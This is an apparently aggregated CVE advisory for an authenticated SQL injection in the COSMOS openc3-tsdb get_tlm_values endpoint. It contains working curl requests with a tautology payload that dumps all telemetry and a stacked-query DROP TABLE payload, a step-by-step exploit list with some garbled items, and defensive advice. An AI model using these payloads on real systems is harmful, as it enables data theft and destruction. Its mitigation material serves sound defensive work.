COSMOS (openc3-tsdb), SQL Injection, CVE-(none) (High)

Listen to this Post

The vulnerability is an authenticated remote SQL injection (CWE-89) in the Time-Series Database (TSDB) component of COSMOS. The flaw resides in the `tsdb_lookup` function inside cvt_model.rb. User-supplied input is directly concatenated into a SQL query without any sanitization or parameterization. This allows an attacker to break out of the intended SQL statement by injecting special characters (e.g., single quotes). The vulnerable endpoint is get_tlm_values, a JSON-RPC method that only requires “tlm” permissions. Roles such as Admin, Operator, Viewer, or Runner all have these permissions, meaning a large subset of authenticated users can trigger the injection. Normally, a request to `get_tlm_values` returns a single array of telemetry values. However, by crafting the `start_time` parameter with a malicious payload (e.g., ' OR '1'='1), an attacker can alter the query logic to return all rows in the database. The injection is not limited to reading; arbitrary SQL commands can be executed. For example, an attacker can issue `DROP TABLE` statements to delete entire tables, destroying historical telemetry data. The attack requires no special privileges beyond basic telemetry viewing rights, making it highly dangerous. The root cause is the failure to use prepared statements or input validation. Exploitation is remote over the network, and the impact includes both confidentiality breach (data disclosure) and availability loss (data deletion).

dailycve form:

Platform: COSMOS openc3-tsdb
Version: All vulnerable
Vulnerability: SQL injection
Severity: High
date: 2026-04-23

Prediction: Patch 2026-05-15

What Undercode Say:

Analytics:

Simulate normal request to get_tlm_values
curl -X POST http://target:2900/api/json-rpc \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","method":"get_tlm_values","params":["TARGET","PACKET","PARAMETER",["start_time","end_time"]],"id":1}'
SQL injection payload to dump all data (start_time value)
Payload: "' OR '1'='1' -- "
curl -X POST http://target:2900/api/json-rpc \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","method":"get_tlm_values","params":["TARGET","PACKET","PARAMETER",["' OR '\''1'\''='\''1'\'' -- ","end_time"]],"id":2}'
Drop tables payload via UNION or stacked query (if supported)
Example: "'; DROP TABLE telemetry; -- "
curl -X POST http://target:2900/api/json-rpc \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","method":"get_tlm_values","params":["TARGET","PACKET","PARAMETER",["'\''; DROP TABLE telemetry; -- ","end_time"]],"id":3}'

Exploit:

  1. Authenticate to COSMOS (any role with “tlm” permission).

2. Capture a valid `get_tlm_values` JSON-RPC request.

  1. Insert SQLi payload into the `start_time` field: `’ OR ‘1’=’1` to bypass WHERE clause.
  2. To delete data, use `’; DROP TABLE ; –` (requires stacked query support in QuestDB).
  3. Send the crafted request. Response will include all telemetry or confirm deletion.

Protection from this CVE:

  • Use parameterized queries/prepared statements (e.g., `prepare` + `execute` in Ruby with `?` placeholders).
  • Apply input validation: reject any `start_time` containing SQL metacharacters (', ;, --, /).
  • Enforce least privilege: separate TSDB query user with read-only permissions, never DROP/delete.
  • Deploy a WAF rule to block ' OR '1'='1, --, and `; DROP` patterns in JSON-RPC parameters.
  • Upgrade to patched version once available (monitor COSMOS GitHub releases).

Impact:

  • Confidentiality: Full telemetry data disclosure (all historical values).
  • Integrity: Possible modification of telemetry records via UPDATE/INSERT injections.
  • Availability: Deletion of entire TSDB tables, causing permanent loss of telemetry history.
  • Scope: Any authenticated user with Viewer role or higher can exploit; no admin needed.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top